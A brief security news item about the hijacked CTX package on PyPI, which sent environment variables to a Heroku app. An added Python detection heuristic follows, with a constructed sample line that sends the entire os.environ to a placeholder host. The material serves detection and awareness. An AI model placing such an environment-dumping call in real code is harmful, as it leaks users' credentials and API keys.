
cRyPtHoN™ INFOSEC (EN)

Malicious Python library CTX removed from PyPI repo.

A suspicious developer appears to have performed a domain hijack to take over the original project.

A malicious and potentially hijacked Python package, CTX, has been removed from the Python Package Index (PyPI) repository after social media users alerted the team to its presence.

On May 24, Indian hacker Somdev Sangwan alerted developers on Twitter to a potential security issue impacting Python’s CTX library. In a tweet, Sangwan said:

“Python’s CTX library and a fork of PHP’s phpass have been compromised. Three million users combined. The malicious code sends all the environment variables to a Heroku app, likely to mine AWS credentials.”

Environment variables can also include other forms of credentials and API keys.

https://portswigger.net/daily-swig/malicious-python-library-ctx-removed-from-pypi-repo
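
An added example, not taken from the article or from PyPI's own tooling: a static triage heuristic for the behaviour the tweet describes, flagging a Python module that both reads the whole environment and imports a network-capable module. The module lists, the name `scan_source` and both sample sources are constructed assumptions; the samples are only parsed, never executed.

```python
import ast

# Assumed heuristic lists (not from the article): modules that can reach the
# network, and mapping methods that read the whole environment, not one key.
NETWORK_MODULES = {"requests", "urllib", "urllib3", "http", "httpx", "aiohttp", "socket"}
BULK_METHODS = {"items", "values", "keys", "copy"}

# Constructed sample: reads single keys only, which is normal application code.
SAMPLE_BENIGN = """\
import os
import requests
token = os.environ.get("API_TOKEN")
debug = "DEBUG" in os.environ
requests.get("https://example.invalid/", headers={"X-Token": token})
"""

# Constructed sample: passes the entire environment to an HTTP call.
SAMPLE_SUSPICIOUS = """\
import os
import requests
def setup():
    requests.get("https://example.invalid/", params=dict(os.environ))
"""

def _is_environ(node):
    """True for `os.environ` or a bare `environ` (from os import environ)."""
    if isinstance(node, ast.Attribute):
        return (node.attr == "environ" and isinstance(node.value, ast.Name)
                and node.value.id == "os")
    return isinstance(node, ast.Name) and node.id == "environ"

def scan_source(source):
    """Report bulk environment reads and network imports in one module's source."""
    tree = ast.parse(source)
    parent = {c: p for p in ast.walk(tree) for c in ast.iter_child_nodes(p)}
    net, bulk = [], []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            net += [a.name for a in node.names if a.name.split(".")[0] in NETWORK_MODULES]
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in NETWORK_MODULES:
                net.append(node.module)
        elif _is_environ(node):
            p = parent.get(node)
            # environ["X"], environ.get("X") and "X" in environ touch one key only.
            if isinstance(p, (ast.Subscript, ast.Compare)):
                continue
            if isinstance(p, ast.Attribute) and p.attr not in BULK_METHODS:
                continue
            bulk.append(node.lineno)
    return {"network_imports": sorted(set(net)), "bulk_env_lines": sorted(set(bulk)),
            "suspicious": bool(net and bulk)}
```

A hit is a prompt for manual review of the package, not proof of compromise: diagnostic tools legitimately dump the environment, and code can reach `os.environ` in ways this heuristic does not follow.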
